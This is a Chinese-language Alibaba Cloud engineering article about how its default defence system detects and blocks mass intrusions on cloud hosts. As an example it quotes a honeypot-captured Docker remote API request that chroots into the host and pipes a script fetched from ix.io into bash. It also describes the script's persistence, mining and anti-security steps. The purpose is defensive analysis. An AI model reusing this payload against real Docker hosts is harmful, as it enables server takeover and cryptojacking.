逃離泄露事件,阿里雲安全默認防禦大揭秘 | 問底中國 IT 技術演進

csdn 發佈 2020-01-10T05:18:53+00:00

POST /v1.24/containers/create HTTP/1.1User-Agent: Go-http-client/1.1{"Hostname"...

作者 | 黃曉堃 阿里雲安全工程師

致謝 | 吳凡 阿里雲高級安全工程師,

郭偉博 阿里雲高級安全工程師

責編 | 屠敏

隨著越來越多企業上雲,我們深刻體會到企業雲化帶來的發展變革,雲原生安全帶來的價值也逐漸明朗起來。阿里雲作為覆蓋全國40%網站的平台,每天承擔著保障雲平台安全的責任,同時將這些原生能力以產品和服務的方式賦能給企業。阿里雲有一支默認防禦團隊,將「默認安全」進行到底,意味著我們將安全基因植入在雲平台上,讓雲上更安全。阿里雲安全提供的豐富安全產品和服務讓客戶和雲平台共建,提升整體企業安全水位。

阿里雲安全默認防禦團隊雙11當日自動識別並攔截來自184個國家發起的60億次攻擊,成功保障雲上租戶業務平穩運行。那麼雲上用戶到底經歷了些什麼?攻擊者又有哪些千變萬化的手段?默認防禦團隊又是怎麼精準識別進行攔截的?下面通過一個例子讓我們一一為大家揭曉。

激烈的攻防對抗

雙11前夜,阿里雲安全默認防禦團隊在雲上部署的蜜罐捕獲到了這樣一條攻擊報文。攻擊者嘗試使用Docker未授權訪問遠程命令執行漏洞來進行攻擊,可以從報文中看到,攻擊者使用iplogger記錄受害者的ip地址,同時向ix.io請求腳本並執行。

POST /v1.24/containers/create HTTP/1.1
User-Agent: Go-http-client/1.1

{"Hostname"......"Cmd":["chroot","/mnt","/bin/sh","-c","curl -4 -s https://iplogger.org/xxxxxx;curl -s -L http://ix.io/xxxx | bash;"],"Image":"alpine".......

跟進這個腳本內容可以發現,其中一部分命令是用來關閉阿里雲的相關服務以及卸載阿里雲主機端安全產品安騎士的動作,目的性非常明顯,就是為了規避阿里雲安全的檢測。除此之外,此腳本會向ssh中寫入公鑰以便後續免密登陸、寫入定時任務持續攻擊、關閉常見服務釋放資源、下載挖礦軟體進行牟利、修改DNS解析防止二次入侵等行為。一旦攻擊成功,伺服器除了正常業務受到嚴重影響,甚至所有權也會移向他人之手。默認防禦自動偵測到相關批量攻擊手段和攻擊團伙,在首次攻擊發生時便已成功攔截,保障用戶正常業務平穩度過雙11。

深入洞察攻擊行為

在我們進行日常阿里雲平台安全保障過程中也發現,攻擊者所使用的攻擊方式越發層出不窮,變化多端。隨著對抗技術手段的不斷升級,黑客行為、黑灰產活動也呈現愈發組織化、專業化。

攻擊鏈路

下圖展示的是惡意團伙典型的整個攻擊流程,大部分攻擊者會選擇通用安全漏洞(例如,Windows永恆之藍漏洞等)或者雲上使用較多的組件漏洞(例如Redis未授權訪問、Struts2遠程命令執行等)以及暴力破解服務帳號口令的方式進行攻擊,從而批量獲取雲主機權限執行惡意指令。這些惡意指令一般是從攻擊團伙所屬的伺服器下載惡意腳本或可執行文件,然後運行。惡意腳本一般包含三部分功能:通信維持C&C模塊(用於後續DDoS、腳本更新或其他指令)、挖礦模塊、蠕蟲掃描模塊(對外掃描,擴大傳染範圍)。

一切黑灰產和犯罪團伙的攻擊都是帶有目的性的,而主要目的就是為了牟利。由於門羅幣具備獨有的匿名貨幣屬性且對CPU架構有優化,極其適用於雲上主機場景,因此成為了犯罪團伙挖礦牟利的首選。

由於攻擊者的收益與受到感染的主機數量直接相關,為了擴大戰果,惡意腳本、惡意木馬的投放更加趨向於蠕蟲化。蠕蟲化的攻擊方式使得惡意程序的傳播能力大幅增強,甚至企業整個內網都可能都淪為挖礦機器,嚴重影響正常業務進行。

相互競爭

與正常業務競爭一樣,黑灰產之間、惡意團伙之間也存在著相互競爭的關係。一台受漏洞影響的雲主機被惡意團伙攻擊成功後,存在著被另一批攻擊者再次攻擊的可能。後者的行為很有可能阻斷前者的財路,因此黑灰產、惡意團伙之間的競爭也會在其所使用的惡意程序中展現的淋漓盡致。一台淪陷了的雲主機往往遭受過多個惡意團伙輪番"摧殘",這也導致恢復起來更加困難,損失更大。

最常見抑制其他攻擊者的手段便是採用腳本殺死包含特定可疑關鍵字的進程,從而保證"為己所用"。又或是一些攻擊團伙攻擊成功後,會修復自身所利用的漏洞以防止其他攻擊者使用。除此之外,Sinkhole技術也被蠕蟲用於對抗同一宿主機上的其他蠕蟲。其原理非常簡單:修改/etc/hosts文件,將"競爭對手"使用的伺服器地址,指向127.0.0.1或0.0.0.0。這樣當其他蠕蟲嘗試從伺服器拉取文件,或嘗試發送上線信息時,請求將會被重定向到本機而無法正常發送,從而一勞永逸的遏制競爭對手。

打造無感化默認防禦機制

憑藉與黑灰產和惡意團伙多年的對抗經驗和技術沉澱,阿里雲安全默認防禦團隊打造了一套完整的入侵攻擊行為智能攔截機制,來實現雲上租戶的無感化默認防禦。該機制是為了抵禦雲上出現的大規模入侵行為,為雲上用戶提供免費的基礎安全防禦能力,是阿里云云盾的基礎安全防禦模塊。下圖展示的是整個機制的結構示意圖。整體結構分為了三部分,威脅感知模塊、關聯分析模塊與攔截處罰模塊。

威脅感知模塊

此模塊能夠通過多種檢測途徑、在攻擊全鏈路上進行威脅感知。團伙識別單元用於對雲上惡意團伙進行分析識別與持續跟進並關注團伙攻擊方式是否變化,進而及時響應;入侵行為檢測單元主要針對入侵行為產生的異常噪聲進行捕獲,從而及時發現可疑的入侵行為;而異常監控單元所收集的異常告警數據,一般作為輔助信息與其他數據一起進行分析。

團伙識別

團伙識別對於整個鏈路的攻擊發現與跟進攻擊手段升級有著重要的戰略意義。下圖展示的是整個團伙分析的流程結構圖。分析單元根據全鏈路監控的告警數據,結合威脅情報、Shodan等空間設備搜尋引擎數據所提供的IOCs(Indicators ofCompromise),通過網絡行為關聯、進程行為模式識別,抽取關聯實體,以圖模型為基礎,構建一張超大規模點邊組成的完整惡意程序行為網絡。之後利用社區發現等圖聚類算法通過對整個行為網絡的數據進行深度挖掘:剝離歸併相同行為特徵的簇群為同一團伙,持續追蹤並關注其擴張狀態或手法更新;監控進程狀態,及時清查挖礦進程運行;實時監控中控通信,防止團伙利用殭屍網絡進行大規模DDoS攻擊。

關聯分析模塊

關聯分析模塊是整個機制的處理核心,其主要功能是通過多個維度綜合判斷惡意行為是否為真正的入侵行為,進而決定放行、攔截或進一步動作。由於單點判斷容易引起很高的誤報,所以一般會使用多個層面的結果進行關聯分析,得到最終的判斷。

威脅情報單元主要是通過關聯情報數據來對攻擊鏈路的各個指標進行信息補充,例如惡意IP、惡意域名、文件哈希值等;歷史行為單元主要用於關聯惡意攻擊歷史行為數據,嘗試對類似的行為進行歸類合併;指紋提取分析單元針對攻擊類型、攻擊方式提取相應攻擊指紋,用以識別、標記攻擊的手段,同時用以入侵原因的綜合分析;惡意行為分析單元藉助AI手段通過多種模型對攻擊手法與告警數據進行智能分析,綜合對整體行為進行黑白性質判定;信譽模型單元主要針對攻擊者、攻擊手段、威脅程度進行畫像評估,返回不同威脅等級的評判結果;除此之外,還有各種專用、通用的檢測模型對數據進行綜合分析挖掘,從而對整個攻擊行為進行定性。

攔截處罰模塊

當關聯分析模塊確認攻擊行為之後,相關的數據信息便會發送到攔截處罰模塊進行攻擊攔截,保證雲上正常用戶業務不受攻擊影響。攔截模塊的智能決策中心會對需要攔截的攻擊者、目標做綜合分析,設置合適的攔截機制。同時,為了防止特殊情況造成的影響,智能決策中心會根據具體情況適當延遲處罰時間,觀察後續動作。監控告警平台負責關注機制所有的流程的正常運轉,發現重大事件時,可以第一時間進行通知,進行人工干預。

結束語

在這套默認防禦機制的保護下,今年雙11期間,阿里雲平台為用戶自動識別並攔截了來自184個國家的60億次攻擊。安全防禦永遠不可能一勞永逸,讓安全問題離用戶越來越遠是我們一直努力的目標。阿里雲願與雲上用戶一起,共同協作,保障雲上安全。

關鍵字: